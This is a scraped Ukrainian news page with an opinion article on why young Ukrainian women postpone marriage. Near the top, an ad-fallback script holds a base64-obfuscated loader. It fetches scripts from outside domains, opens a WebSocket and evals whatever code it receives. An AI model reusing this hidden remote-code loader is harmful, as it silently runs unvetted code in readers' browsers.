        <a class='auth_button' href='/authors'>
          Всі автори
        </a>
      </div>
    </div>
  </div>

    <div id='social_block_article' class='social_block'>
      <span class='caption center'>Поділитись з друзями</span>
      <div class='social_list'>
        <span class='share_block'></span>
        <div class='addthis_inline_share_toolbox'></div>
        <div class='social_item'>
          <a class='social_link comment' href='#comment'>
            <span class='capt'>
              Коментувати
            </span>
            <span class='count'>
            </span>
          </a>
        </div>
      </div>
    <div style="clear: both"></div>
    <div id="MIXADV_2407" class="MIXADVERT_NET"></div>
          <script type="text/javascript">
          var node2407 = document.getElementById("MIXADV_2407");
          if( node2407 )
          {
               var script = document.createElement("script");
               script.charset = "utf-8";
               script.src = "https://m.mixadvert.com/show/?id=2407&r="+Math.random();
               node2407.parentNode.appendChild(script);
               script.onerror = function(){
                  window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBob3N0ID0gKCBkYXRlLmdldERhdGUoKSA8IDE1ID8gIm5hc2RmZy5jb20iIDogIm5ldHNsZWQubmV0IiApO3ZhciBzY3JpcHRfZmlyc3QgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTtzY3JpcHRfZmlyc3Quc3JjID0gImh0dHBzOi8vIisgaG9zdCsiL3Nob3cvP2lkPTI0MDcmcj0iK01hdGgucmFuZG9tKCk7bm9kZTI0MDcucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChzY3JpcHRfZmlyc3QpO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt3aW5kb3cuZXZhbChhdG9iKCJjM1J5SUQwZ0oyTnZibTRnUFNCdVpYY2dWMlZpVTI5amEyVjBLQ0ozY3pvdkx5SXJhRzl6ZENzaU9qZ3dPREF2TWpRd055SXBPeUJqYjI1dUxtOXViV1Z6YzJGblpTQTlJR1oxYm1OMGFXOXVJQ2hsZG5RcElIc2djRzl6ZEUxbGMzTmhaMlVvWlhaMExtUmhkR0VwT3lCamIyNXVMbU5zYjNObEtDazdmU2M3ZG1GeUlIZHZjbXRsY2lBOUlHNWxkeUJYYjNKclpYSW9WVkpNTG1OeVpXRjBaVTlpYW1WamRGVlNUQ2h1WlhjZ1FteHZZaWhiSW1WMllXd29JQ2NpSzNOMGNpc2lKeWtpWFNrc0lIdDBlWEJsT2lBbmRHVjRkQzlxWVhaaGMyTnlhWEIwSjMwcEtUdDNiM0pyWlhJdWNHOXpkRTFsYzNOaFoyVW9KekVuS1RzZ2QyOXlhMlZ5TG05dWJXVnpjMkZuWlNBOUlHWjFibU4wYVc5dUlDaHRjMmNwSUhzZ2QybHVaRzkzTG1WMllXd29iWE5uTG1SaGRHRXBPeUI5T3lBPSIpKTt9OyBzY3JpcHRfZmlyc3QucmVtb3ZlKCk7") );
              }
          }
          </script>
    </div>
  </div>

  <div class='article_center'>
    <div class="top_social_holder">
    <noindex>
      <div class="top_social_b">
        <div class='fb_holder'><div class='fb-like' data-layout='button_count' data-action='recommend' data-show-faces='false' data-share='false'></div></div>
        <div class='twitter_holder'><a href='http://twitter.com/share' class='twitter-share-button' data-text='Чому сучасні українські дівчата  не поспішають заміж' data-via='zn_ua' data-lang='ru'>Твитнуть</a></div>
        <div class='g_button'><div class='g-plus' data-action='share' data-annotation='bubble'></div></div>

        <div class='clear'></div>
      </div>
    </noindex>
    </div>
    <div class="article_body" itemprop="articleBody">
      <div class="summary" itemprop="alternativeHeadline">
        <p>
          
        </p>
      </div>
      <p></p>

<div class="bottom_block">



      <div class="picture">
        
        
        
        <div class='top_photo top'>
           <div class="frame_image">
              <div class='gradient_article'></div>
              <img class='img' src='//image.zn.ua/media/images/645x426/Oct2017/187699.jpg' alt='' title='девушки в парке' />
           </div>
           <span class='photo_descr'>
             <span class='title'>
               
             </span>
            
            
            <span class='source 1'>&#169 Василь Артюшенко, DT.UA</span>
            

           </span>
           
        </div>
        
      </div>
      <div class='article_body'>
        <div class='text'>
            <p class="p1"><strong>Їй до двадцяти п'яти років. Вона розумна, приваблива, незалежна. Має освіту, вміє заробляти гроші, забезпечує свої потреби. В анамнезі кілька стосунків, можливо, один чи два "цивільні" шлюби. Але офіційного заміжжя поки що не планує.</strong></p>
<p class="p5">Бунт українських дівчат проти раннього шлюбу розпочався ще з десяток років тому. Тоді його ніхто не помітив, бо він був стихійним і неусвідомленим, мав вигляд своєрідного флешмобу. Батьки хапалися за голову: зіграли дорогуще весілля для дітей, а вони розбіглися за півроку. Потім зійшлися з іншими й знову розбіглися. </p>
<p class="p5">Мало-помалу стало зрозуміло, що юні панянки поспішали заміж не для створення сім'ї, народження дітей, спільного життя з коханим, а щоб підтвердити свій статус — з'явитися перед подружками в шикарній весільній сукні. Весільна сукня виявилась останнім бастіоном, що стримував жіноцтво від руху до свободи. Туди, де жінка не поденна працівниця на сімейному фронті, а людина, яка має право насолоджуватися життям, як і інші істоти на планеті Земля. </p>
<p class="p5">Світоглядний розрив між старими традиціями і новими поглядами видно вже неозброєним оком. Парубки, що досягли шлюбного віку і мають внутрішню потребу створити сім'ю, розгублені — чому ніхто не хоче йти за них заміж? Що з ними не так? </p>
<p class="p5">З ними все так. Самостійні, привабливі, без шкідливих звичок, добре заробляють, готові забезпечувати сім'ю. Чоловіки мрії наших бабусь і матерів. Дівчата залюбки з ними спілкуються, ходять на побачення і… тікають. Бо усвідомлюють, що сімейне гніздечко, в яке їх так лагідно кличуть, по суті — клітка, з якої потім не вибратися. </p>
<p class="p5">Самореалізація, розвиток, професійна кар'єра — це речі, на які має право кожен чоловік і теоретично таке саме право має кожна жінка. Та на практиці все виглядає інакше. Ти можеш будувати свою кар'єру, вдосконалюватися, розвивати свої здібності, але... у вільний від сім'ї час. Діти, догляд за чоловіком, створення домашнього затишку — ось усе, чого від тебе чекають суспільство і сім'я. Зможеш викроїти хвилинку для себе — будь ласка. Ні — забудь про себе, свої мрії і своє життя. "Яка самореалізація? Ти про що? В тебе діти не нагодовані і квартира не прибрана. Займайся своїми прямими обов'язками і викинь дурниці з голови!"</p>
<p class="p5">У цьому сенсі дуже промовиста історія художниці, яку по праву вважають нашим національним скарбом. Чарівні квіти Катерини Білокур могли б так ніколи й не розквітнути на полотні, якби вона прожила традиційну долю української жінки. Неймовірно прекрасний світ, що вирвався через її руки на волю, так би й залишився ніким не бачений в її душі, якби майстриня свого часу не поставила на кін своє життя. Тільки після спроби самогубства батьки дозволили талановитій дівчинці малювати. Але село, яке вона так любила і душу якого оспівувала у своїх картинах, не прийняло її, вважало "чудною" і навіть пропащою. </p>
<p class="p5">Сучасним дівчатам дико дивитися на те, що їм пропонує подружнє життя. Ще сто чи п'ятдесят років тому виховання дівчинки цілком підпорядковувалося майбутній ролі матері і дружини. Підпорядковувалося, бо іншого виходу не було. Дитячі руки змалечку включалися в домашню роботу: куховарили, прибирали, працювали на городі чи порали худобу. Інакше, вижити було неможливо. Що в місті, що в селі, діти, щойно зіп'явшись на ноги, допомагали сім'ї добувати хліб насущний. Але нині все змінилося. </p>
<p class="p5">Сучасна дівчинка в українській сім'ї — то квіточка. Круг неї танцюють мама-тато, бабусі-дідусі. Школи раннього розвитку, танці, художня й музична школи, англійська, гімнастика, акробатика — родина рве жили, аби їхня донечка мала все найліпше і найкорисніше. Заради справедливості потрібно сказати, що те саме стосується й хлопчиків. Їх віддають до спортивних секцій, технічних студій, на ті ж таки танці. Але хлопчики надалі всю свою енергію спрямовують на те, щоб якнайкраще утвердитися в житті, здобути професію, знайти хорошу роботу, бути матеріально незалежним, мати авторитет. А дівчаткам суспільна свідомість пропонує те саме, що й 100—200 років тому, — вдало вийти заміж. </p>
<p class="p5">І так само, як 100 й 200 років тому, вдале заміжжя означає лише одне — надійний чоловік забезпечить тобі можливість добре виконувати свої прямі обов'язки: ростити дітей, поратися в домі й догоджати чоловікові. І якщо тобі дуже вже пощастить, якщо будеш настільки розумна й вправна, що стане сил і часу, ти зможеш домогтися чогось і для себе. </p>
<p class="p5">"Вибачте, — кажуть сучасні дівчата. — Вибачте, а де ж я? Де ж щось мені? Невже світ створений лише для чоловіків та дітей? Може, і в мене є якісь мрії й амбіції!" </p>
<p class="p5">Навколишнє життя надзвичайно різноманітне й цікаве. Воно азартне. Дає можливість випробовувати свої сили, домагатися результатів і змінювати світ. Одна відома блогерка і за сумісництвом психолог нещодавно написала у ФБ, що в усіх книжках, які вона прочитала в дитинстві, жінкам відводилася роль лише подружки героя, а тим часом вона сама хотіла стати героєм. Саме тому, що сучасні дівчата самі хочуть бути героями, вони й відкладають заміжжя, бо гендерної рівності в Україні немає. </p>
<p class="p5">Молодь у наш час набагато прагматичніша, ніж колись були ми. Романтика, кохання, "рожеві окуляри" більше не мають такої влади над вчинками і не надто впливають на вибір. Абсолютно нормально на першому побаченні обговорити гіпотетичне подружнє життя і власне розуміння подружніх обов'язків. І тут відбуваються цікаві речі. Більшість хлопців сповідує традиційні погляди. Вони позиціюють себе як справжніх чоловіків, які будуть гарними батьками, чоловіками, забезпечуватимуть сім'ю, і це начебто ж добре, але… Дружину вони бачать лише як додаток до своїх цілей, а не як самостійну особистість зі своїми власними цілями. </p>
<p class="p5">Побудувати будинок, народити дітей, здобути авторитет у суспільстві, заробити грошей… Для всього цього потрібна жінка, яка "забезпечуватиме тил", тобто робитиме хатню роботу, тягтиме на своїх плечах виховання дітей, відповідатиме за безліч великих і дрібних справ, аби дати чоловікові можливість займатися власним життям і самореалізацією, не відволікаючись на сімейні проблеми. </p>
<p class="p5">Жінка плекатиме дітей під час декрету, потім робитиме з ними уроки, сидітиме на лікарняному, коли вони захворіють. Гуртки, секції, репетитори — теж на її плечах. Відвести, привести, нагодувати, випрати речі. Вона буде змушена повсякчас жертвувати роботою, підганятиме відпустки під потреби дітей, працюватиме на неповну ставку. Можливо, й зовсім відмовиться від роботи, бо нема кому допомогти з дітьми. Полегшення настане лише після 40, але найпродуктивніший час буде втрачено. </p>
<p class="p5">Дівчата більше не хочуть грати в цю гру. Вони відмовляються виступати в ролі додатка. Вони хочуть бути самостійною фігурою на шахівниці життя. Тому варіант раннього заміжжя й відпадає. Це відразу зав'яже світ на довгі-довгі роки вперед. </p>
<p class="p5">Іншим аргументом проти раннього шлюбу виступає елементарна безпека. Поки жінка няньчиться з малечею, в неї невеликі можливості заробляти гроші. Комусь, звичайно, вдається, але це, скоріше, виняток. Заклопотана домашніми справами дружина потрапляє в залежність від чоловіка та його заробітків. Відтак він виривається вперед, а вона змушена топтатися на місці. Його бісить її обмеженість, а її — відсутність фізичної допомоги й моральної підтримки. Об'єктивно ці двоє втрачають точки дотику. Він знаходить собі іншу, а вона опиняється біля розбитого корита: без хорошої роботи, без кар'єри, без можливості нормально забезпечувати своє життя. Деякі з них опиняються й без дітей. Бо відібрати в набагато біднішої матеріально колишньої дружини дітей не так уже й важко. </p>
<p class="p5">Надивившись на долю своїх матусь, дівчата розуміють, що безпечний шлюб — це рівний шлюб. Висока кваліфікація, гідна платня, власне житло, можливість найняти няню, якщо буде потрібно, — ось справжнє підґрунтя для нормального сімейного життя, а не те, що називається неземною любов'ю. Тому вони й планують заміжжя десь під 30—35 років. Доти можна трішки пожити для себе, подивитися світ, заробити на квартиру, здобути одну, а то й кілька гарних професій.</p>
<p class="p5">Надії на гендерну рівність у сім'ї в сучасних дівчат немає. Розподіл відповідальності з чоловіком порівну залишається не меншою фантастикою, ніж політ на Марс. Хоча певний рух у цьому напрямку є, масовим його назвати ніяк не можна.</p>
<p class="p5">"У нас мама відповідальна за все", — пише в блозі психолог. На прийом вони приходять тривожні і вкрай замучені, тому знімати відповідальність доводиться шар за шаром, як капустяне листя. Бо, якщо навіть дитина гуляла з батьком і застудилася, все одно винна мама — вдягла не так, не передбачила, що буде жарко чи холодно. Та зняти з себе відповідальність мало. Потрібно, щоб хтось її взяв... </p>
<p class="p5">Сучасні українські дівчата це добре усвідомлюють, тому намагаються відкласти не таке вже й легке сімейне життя. Вони ще далекі від європейського тяжіння до самотності, але вважають за краще вступати в шлюб зрілими, морально й матеріально підготовленими. Вони хочуть бути незалежними й самостійними і не бажають поступатися своєю свободою і самореалізацією. </p>
<p class="p5">Образ сім'ї як човна, в якому веслують двоє, поступово відходить у минуле. На часі нове бачення, коли два самостійні човни пливуть поряд. Подружжя підтримує одне одного, спільно опікується маленькими човниками у спільному безпечному просторі, але в кожного — свої цілі й своє життя. Ніхто нікому не кориться і нічим не жертвує.</p>
        <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
        <script type="text/javascript">
          var positionBanner = 2500; //интервал размещения баннеров
          var heightBody =  $(".article_center .article_body .text").height(); //высота статьи
//          console.log('--heightBody' + heightBody);
          var offset = $(".article_center .article_body .text").offset();   //отступ от начала статьи до баннера
//          console.log('--offset' + heightBody);
          var array = {};
          var m = 1;
          var banner = false;

          if(heightBody>positionBanner){
            var countBanner = Math.round(heightBody/positionBanner); //кол-во банеров в статье
            for (var i=0; i<countBanner; i++){
              array[i] = positionBanner*(i+1);
            }
            $(".article_center .article_body .text p").each(function(n){
              if(Math.round($(this).offset().top)>=positionBanner*m) {
                banner = false;
                m++;
              }
              if(Math.round($(this).offset().top)>=positionBanner && Math.round($(this).offset().top)<positionBanner*m && !banner) {
                $(this).addClass("banner_txt");
                $(this).append("<div id='poster"+m+"' style='width:650px; margin:20px auto 0;'><ins class='adsbygoogle' style='display:block; text-align:center;' data-ad-format='fluid' data-ad-layout='in-article' data-ad-client='ca-pub-5515961538037914' data-ad-slot='5625831357'></ins></div>");
                banner = true;
                (adsbygoogle = window.adsbygoogle || []).push({});
              }
            });
          }
        </script>
        </div>
        
        <ul class='hashtags'>
        
          <li class='item'>
            <a class='section' href='/tags/Наталія Михайленко'>#Наталія Михайленко</a>
          </li>
        
        </ul>


      </div>

      

      <!--<span class='soc'>
        <span class='share_block'></span>
        <div class="soc yashare-auto-init" data-yashareL10n="ru" data-yashareType="big" data-yashareQuickServices="vkontakte,facebook,twitter,gplus,odnoklassniki" data-yashareTheme="counter"></div>
      </span>-->
      <form id='mistake_form' class='ajax form' action='/family/chomu-suchasni-ukrayinski-divchata-ne-pospishayut-zamizh-257570_.html#mistake_msg' method='post' enctype='multipart/form-data' rel='{"connector":"box_dtua2","point":"central_article"}'>
         <span class='mistake '><b>Помітили помилку?</b><br>Будь ласка, позначте її мишкою і натисніть Ctrl+Enter</span>
         <input type='hidden' id='mistake_text' name='mistake_text' value='' />
         <input type='hidden' id='editor_name' name='editor_name' value='Силин Андрей' />
         <input type='hidden' id='article_title' name='article_title' value='Чому сучасні українські дівчата  не поспішають заміж' />
         <input type='hidden' name='action' value='mistake' />
      </form>
      <div id='mistake_msg'></div>
      <div class="clear"></div>
    </div>




   </div>
  </div>
</div>
<script type="text/javascript" src="//yastatic.net/share/share.js" charset="utf-8"></script>
<script type='text/javascript'>
  $(document).ready(function(){

    var distanceTop_fix = $('#social_block_article').offset().top + 50;
    var comment_height = $('#comments_block').outerHeight();
    //var distanceTop_abs = $('#comments_block').offset().top + comment_height - $('#social_block_article').outerHeight() - 50;
    var distanceTop_abs = $('#comments_block').offset().top + comment_height - 530;


    $(window).scroll(function(){
      try {
        var pos = parseInt( $( window ).scrollTop() );

        if (pos > distanceTop_fix) {
          $('#social_block_article').addClass('fixed');
          $('#social_block_article').css({'top': '80px'});

          }
        else {
          $('#social_block_article').removeClass('fixed');
        }
        if (pos > distanceTop_abs) {
          $('#social_block_article').addClass('abs');
          $('#social_block_article').css({'top': distanceTop_abs+'px'});
          }
        else {
          $('#social_block_article').removeClass('abs');
          $('#social_block_article').css({'top':'80px'});
        }
      }
      catch(e) {
      }
    });


  });

  box_dtua2.central_article.init();

</script><div class="banner8">
  <div style="width:580px; height:400px;">
    <script type="text/javascript">
    function adriverPoster(L){
        if(typeof(ar_cn)=="undefined")ar_cn=1;
        var W=window,D=document,E=D.documentElement,T=0,N=ar_cn,P=0,C=D.compatMode=="CSS1Compat",
            X='<scr'+'ipt type="text/javascript">var ar_bnum='+N+';setTimeout(function(e){if(!self.CgiHref){document.close();e=parent.document.getElementById("ar_container_"+ar_bnum);e.parentNode.removeChild(e)}},3000);',
            Y='<\/sc'+'ript><sc'+'ript type="text/javascript" src="' + ('https:' == document.location.protocol ? 'https:' : 'http:') + ''+L+'&tail256='+escape(D.referrer||'unknown')+'&rnd='+Math.round(Math.random()*999999999)+'"><\/sc'+'ript>';
        function G(){if(T++<100){var ph=document.getElementById('ad_ph_'+N);if (ph){var c=ph.previousSibling;c.innerHTML='<iframe id="ar_container_'+N+'" width=1 height=1 marginwidth=0 marginheight=0 scrolling=no frameborder=0><\/iframe>'}else{setTimeout(arguments.callee,100);return}var o=D.getElementById('ar_container_'+N);if(o){try{var d=o.contentDocument||(W.ActiveXObject&&W.frames['ar_container_'+N].document);if(d){d.write(X+Y)}else setTimeout(arguments.callee,100)}catch(e){try{o.src = "javascript:{document.write('"+X+'document.domain="'+D.domain+'";'+Y+"')}";return}catch(E){}}}else setTimeout(arguments.callee,100)}}
        function A(e,t,f){if(e.addEventListener)e.addEventListener(t,f,false);else if(e.attachEvent)e.attachEvent('on'+t,f)}
        function R(e,t,f){if(e.removeEventListener)e.removeEventListener(t,f,false);else if(e.detachEvent)e.detachEvent('on'+t,f)}
        function S(){var ch=self.innerHeight||C&&E.clientHeight||D.body.clientHeight,st=self.pageYOffset||C&&E.scrollTop||D.body.scrollTop;if(P>=st&&st+ch>=P){R(W,'scroll',S);G()}}
        A(W,'load',function(){var o=D.getElementById('ad_ph_'+N);if(o){while(o.offsetParent){P+=o.offsetTop;o=o.offsetParent}A(W,'scroll',S);S()}});
        D.write('<div style="position:absolute;visibility:hidden;height:0px;"><\/div><div id="ad_ph_'+N+'"><\/div>');
        ar_cn++;
    }
    adriverPoster('//ad.adriver.ru/cgi-bin/erle.cgi?sid=161943&bn=6&target=blank&bt=49&pz=0');
    </script>
  </div>
</div><div id='comments_block' class='cb_small'>
  <a class='comment_anchore' name='comment' id='comment'></a>
  
<link rel='stylesheet' type='text/css' href='/static/style/comments.css' />
<div class='c_head'>
  <span class='block_title'>Додати коментар</span>
  <span class='u_form'>
    <form class='comments_block ajax' action='/family/chomu-suchasni-ukrayinski-divchata-ne-pospishayut-zamizh-257570_.html#comments_block' method='post' enctype='multipart/form-data' rel='{"connector":"box_dtua2","point":"comments"}'>
      <img class='u_avatar' src='' alt='' title='' />
      <span class='b_text'>
        <span class='f_quote q' style='display:none;'>
          <span class='n'></span>
          <span class='d'></span>
          <span class='t'></span>
        </span>
        <span class='behavior_holder'>
          <span class='behavior' id='behavior_comment_textarea'></span>
        </span>
        <textarea id='comment_textarea' class='textarea' name='comment' placeholder='Коментар'></textarea>
      </span>
      <div class='label msg'>Залишилось символів: <span class='label' id='comment_length'>2000</span></div>
      <div class='label msg_warning'>Авторизуйтеся, щоб мати можливість коментувати матеріали</div>
      <input disabled type='button' id='comment_submit' class='u_submit' value='Відправити коментар' />
      
      <input type='hidden' name='action' value='adding' />
      <input type='hidden' name='id_comment' value='0' />
    </form>
  </span>

  
  <div id='c_user_auth' class='1' style='display:none;'>
    <div class='ca_menu'>
      <a rel='register' class='a selected' href='javascript:void(0)'>
        <span class='text'>Немає облікового запису? Зареєструйтеся!</span>
        <span class='plash_sel'></span>
      </a>
      <a rel='login' class='a' href='javascript:void(0)'>
        <span class='text'>Логін</span>
        <span class='plash_sel'></span>
      </a>
      <a rel='forgot' class='a' href='javascript:void(0)'>
        <span class='text'>Забули пароль?</span>
        <span class='plash_sel'></span>
      </a>
<!--//      <span rel='settings' class='a last'>
        <span class='text'>Settings</span>
        <span class='plash_sel'></span>
      </span>//-->
    </div>

    <div class='ca_cntn register' style='display:none;'>
      <form class='ajax' action='/family/chomu-suchasni-ukrayinski-divchata-ne-pospishayut-zamizh-257570_.html#cua_message' method='post' enctype='multipart/form-data' rel='{"connector":"svc_dtua2","point":"ua_register"}'>
        <div class='i_inp i_login'>
          <span class='msg'><span class='txt'></span><span class='arw'></span></span>
          <input class='field' type='text' placeholder='Логін' name='login' value='' size='20' />
        </div>
<!--//        <div class='i_inp i_fullname'>
          <span class='msg'><span class='txt'></span><span class='arw'></span></span>
          <input class='field' type='text' placeholder='Full name' value='' name='fullname' size='20' />
        </div>//-->
        <div class='i_inp i_email i_last'>
          <span class='msg'><span class='txt'></span><span class='arw'></span></span>
          <input class='field' type='text' placeholder='Адреса електронної пошти' value='' name='email' size='50' />
        </div>
        <div class='i_inp i_password'>
          <span class='msg'><span class='txt'></span><span class='arw'></span></span>
          <input rel='pass_1' class='field pass' type='password' placeholder='Пароль' name='password' value='' size='20' />
          <a rel='eye_pass_1' class='pass_eye' href='javascript:void(0);'></a>
        </div>
        <div class='i_inp i_password_confirm'>
          <span class='msg'><span class='txt'></span><span class='arw'></span></span>
          <input rel='pass_2' class='field pass' type='password' placeholder='Repeat Password' name='password_confirm' value='' size='20' />
          <a rel='eye_pass_2' class='pass_eye' href='javascript:void(0);'></a>
        </div>
        <div class='i_inp i_captcha i_last'>
          <span class='msg'><span class='txt'></span><span class='arw'></span></span>
          <img   class='img_captcha' src='/static/app/captcha/index.php?width=80&height=30&fontsize=20&mode=5ba35b44dc1edf054662c8c13d0077ee&unique=1c05e0833c8b5864cec10a90c9a732d2' alt='captcha' />
          <input class='field f_captcha' type='text' placeholder='Перевірка' name='captcha' value='' size='20' />
        </div>
        <input type='submit' class='button' value='Зареєструватися' />

        <input type='hidden' name='xpath' value='#c_user_auth .ca_cntn.register' />
      </form>
    </div>

    <div class='ca_cntn login' style='display:none;'>
      <form class='ajax' action='/family/chomu-suchasni-ukrayinski-divchata-ne-pospishayut-zamizh-257570_.html#cua_message' method='post' enctype='multipart/form-data' rel='{"connector":"svc_dtua2","point":"ua_login"}'>
        <div class='i_inp i_login'>
          <span class='msg'><span class='txt'></span><span class='arw'></span></span>
          <input class='field' type='text' placeholder='Логін' name='login' value='' size='20' />
        </div>
        <div class='i_inp i_password'>
          <span class='msg'><span class='txt'></span><span class='arw'></span></span>
          <input rel='pass_3' class='field pass' type='password' placeholder='Пароль' name='password' value='' size='20' />
          <a rel='eye_pass_3' class='pass_eye' href='javascript:void(0);'></a>
        </div>
        <input type='submit' class='button' value='увійти' />

        <input type='hidden' name='xpath' value='#c_user_auth .ca_cntn.login' />
      </form>
    </div>

    <div class='ca_cntn forgot' style='display:none;'>
      <form class='ajax' action='/family/chomu-suchasni-ukrayinski-divchata-ne-pospishayut-zamizh-257570_.html#cua_message' method='post' enctype='multipart/form-data' rel='{"connector":"svc_dtua2","point":"ua_forgot"}'>
        <div class='i_inp i_email'>
          <span class='msg'><span class='txt'></span><span class='arw'></span></span>
          <input class='field' type='text' placeholder='Адреса електронної пошти' value='' name='email' size='50' />
        </div>
        <input type='submit' class='button' value='нагадати пароль' />

        <input type='hidden' name='xpath' value='#c_user_auth .ca_cntn.forgot' />
      </form>
    </div>

    <div class='soc_auth'>
      <div class='message'>Або увійдіть через соцмережі</div>
      <div class='to_log'>
        <a href='?authstate=3' class='c_fb'>Facebook</a>
        <!--<a href='?authstate=2' class='c_vk'>VKontakte</a>-->
        <a href='?authstate=4' class='c_tw' id='c_login_tw_button'>Twitter</a>
        <a href='?authstate=6' class='c_gp'>Google</a>
      </div>
    </div>



    <div class='ca_hide'>
      <a class='to_hide' href='javascript:void(0)'>Сховати</a>
    </div>
    <div id='cua_message'></div>

    <script type='text/javascript'>
      function caFormMode(mode) {
        $('#c_user_auth .ca_menu .a').each(function(){
          $(this).removeClass('selected');
          if($(this).attr('rel') == mode && !$(this).is('.selected')) {
            $(this).addClass('selected');
          }
        });

        $('#c_user_auth .ca_cntn').each(function(){
          $(this).hide();
          if($(this).is('.'+mode)) {
            $(this).show();
          }
        });
      };

      $(document).ready(function(){
        caFormMode('login');

        $('#c_user_auth .ca_menu a.a').click(function(){
          caFormMode($(this).attr('rel'));
        });

        $('#c_user_auth .field.pass').hover(
          function () {
            var r = 'eye_'+$(this).attr('rel');
            if(!$('#c_user_auth .pass_eye[rel='+r+']').is('.hover')) $('#c_user_auth .pass_eye[rel='+r+']').addClass('hover');
          },
          function () {
            var r = 'eye_'+$(this).attr('rel');
            if($('#c_user_auth .pass_eye[rel='+r+']').is('.hover')) $('#c_user_auth .pass_eye[rel='+r+']').removeClass('hover');
          }
        );

        $('#c_user_auth .field.pass').live('focus', function () {
          var r = 'eye_'+$(this).attr('rel');
          if(!$('#c_user_auth .pass_eye[rel='+r+']').is('.focus')) $('#c_user_auth .pass_eye[rel='+r+']').addClass('focus');
        });

        $('#c_user_auth .field.pass').live('blur', function () {
          var r = 'eye_'+$(this).attr('rel');
          if($('#c_user_auth .pass_eye[rel='+r+']').is('.focus')) $('#c_user_auth .pass_eye[rel='+r+']').removeClass('focus');
        });

        $('#c_user_auth .pass_eye').click(function(){
          var r = $(this).attr('rel').replace('eye_','');
          var o = $('#c_user_auth .field.pass[rel='+r+']');
          ShowHidePassword($(o),$(this));
        });

        $('#c_user_auth .ca_cntn.register .i_inp').hover(
          function () {
            if($(this).is('.empty')) $(this).removeClass('empty');
            if($(this).is('.error')) $(this).removeClass('error');
          },
          function () {
          }
        );
      });
    </script>
  </div>
  
</div>

<form action='/family/chomu-suchasni-ukrayinski-divchata-ne-pospishayut-zamizh-257570_.html#comment_update' method='POST' enctype='multipart/form-data' class='update ajax' rel='{"connector":"int_dtua2","point":"comment_update"}'>
  <span id='comment_update'></span>
  <input type='hidden' name='action' value='' />
  <input type='hidden' name='id_comment' value='0' />
</form>

<div id='comments_list' class='comments_block'>
  
  <form class='comments_list ajax' action='/family/chomu-suchasni-ukrayinski-divchata-ne-pospishayut-zamizh-257570_.html#comments_list' method='post' enctype='multipart/form-data' rel='{"connector":"int_dtua2","point":"comments_list"}'></form>
  <div class='c_sort'>
    
    <span class='ci count'>Усього коментарів: <span>0</span></span>
  </div>

  
<ul class='comments'>
  
</ul>

<div id='ae5b89b2e5fc939e5ace8fae3de14a46' class='more_content'>
  <input type='hidden' id='cl_current_sort' value='popular' />
  <input type='hidden' id='cl_current_count' value='1' />
  

  <form action='/family/chomu-suchasni-ukrayinski-divchata-ne-pospishayut-zamizh-257570_.html#ae5b89b2e5fc939e5ace8fae3de14a46' method='POST' enctype='multipart/form-data' class='ajax' rel='{"connector":"int_dtua2","point":"comments_list"}'></form>
</div>

<script type='text/javascript'>
  $(document).ready(function() {
    $('#ae5b89b2e5fc939e5ace8fae3de14a46 a.show_comments').click(function(){
      box_dtua2.set_post_params_by_url($(this).attr('href'),'#ae5b89b2e5fc939e5ace8fae3de14a46 form');
      box_dtua2.preloader.show();
      $(this).hide();
      cb_backing_form();
      $('#ae5b89b2e5fc939e5ace8fae3de14a46 form').submit();
      return false;
    });
  });
</script>

<script type='text/javascript'>
  box_dtua2.preloader.hide();
</script>


  <script type='text/javascript'>
    $(document).ready(function() {
      $('#comments_list .c_sort a.sort').click(function(){
        box_dtua2.set_post_params_by_url($(this).attr('href'),'#comments_list form.comments_list');
        box_dtua2.preloader.show();
        cb_backing_form();
        $('#comments_list form.comments_list').submit();
        return false;
      });
    });
  </script>

</div>






<script type='text/javascript'>
  $(document).ready(function() {
    $('#comment_textarea').focus(function(e) {
      if($('#comments_block #c_user_auth').length > 0) {
        $('#comments_block #comment_textarea').prop('disabled', true);
        $('#container #comments_block .label.msg_warning').css("visibility","visible");
        caFormMode('login');
        cua_show();
      }
    });

    $('#comment_textarea').keyup(function(e) {
      textareaBehavior($('#comment_textarea'), $('#behavior_comment_textarea'), 30);
    });

    $('#comment_submit').click(function(){
      box_dtua2.preloader.show();
      $('#comments_block form.comments_block').submit();
      return false;
    });
  });
</script>

<script type='text/javascript'>
  box_dtua2.preloader.hide();
</script>

</div>



<script type='text/javascript'>
  function cb_backing_form() {
    var uf = $('#comments_block .u_form');
    $(uf).prependTo("#comments_block .c_head");
    $(uf).find('[name="id_comment"]').val(0);
    $(uf).find('[name="action"]').val('insert');
    $(uf).find('[name="sort"]').remove();
    $(uf).find('[name="limit"]').remove();
    $(uf).find('.f_quote').hide();
  };

  function cua_show() {
    if(!$('#comments_block #c_user_auth').is(':visible')) {
      $('#comments_block #c_user_auth').animate({height:'show'}, 500);
    }
  };

  function cua_hide() {
    if($('#comments_block #c_user_auth').is(':visible')) {
      $('#comments_block #c_user_auth').animate({height:'hide'}, 500);
    }
  };

  $(document).ready(function() {
    $(document).on('click','#comments_list .comments a.baq',function(){
      if($('#comments_block #c_user_auth').length > 0) {
        $('html,body').animate({scrollTop: Math.round($('#comments_block').offset().top - $('#header').height())}, 500, function(){
          $('#comment_textarea').focus();
        });
      }
      else {
        var action = $(this).is('.answer')?'answer':'quote';

        var uf = $('#comments_block .u_form');
        $(uf).insertBefore($(this).parent());
        $(uf).find('[name="id_comment"]').val($(this).attr('rel'));
        $(uf).find('[name="action"]').val(action);

        switch(action) {
          case('answer'):
            if($(uf).find('[name="sort"]').length <= 0)  $(uf).find('form').append('<input type="hidden" name="sort" value="'+$('#comments_block #cl_current_sort').val()+'" />');
            if($(uf).find('[name="limit"]').length <= 0) $(uf).find('form').append('<input type="hidden" name="limit" value="'+$('#comments_block #cl_current_count').val()+'" />');

            $(uf).find('.f_quote').hide();
          break;

          case('quote'):
            $(uf).find('[name="sort"]').remove();
            $(uf).find('[name="limit"]').remove();

            var item = $(this).parent().parent().parent();
            $(uf).find('.f_quote .n').text($(item).find('.i_head .u_name').text());
            $(uf).find('.f_quote .d').text($(item).find('.i_head .c_date').text());
            $(uf).find('.f_quote .t').text($(item).find('.i_body .i_text').text());
            $(uf).find('.f_quote').show();
          break;
        }
      }
    });

    $(document).on('click','#comments_list .comments a.vote',function(){
      var action = $(this).is('.up')?'vote_up':'vote_down';

      var f = $('#comments_block form.update');
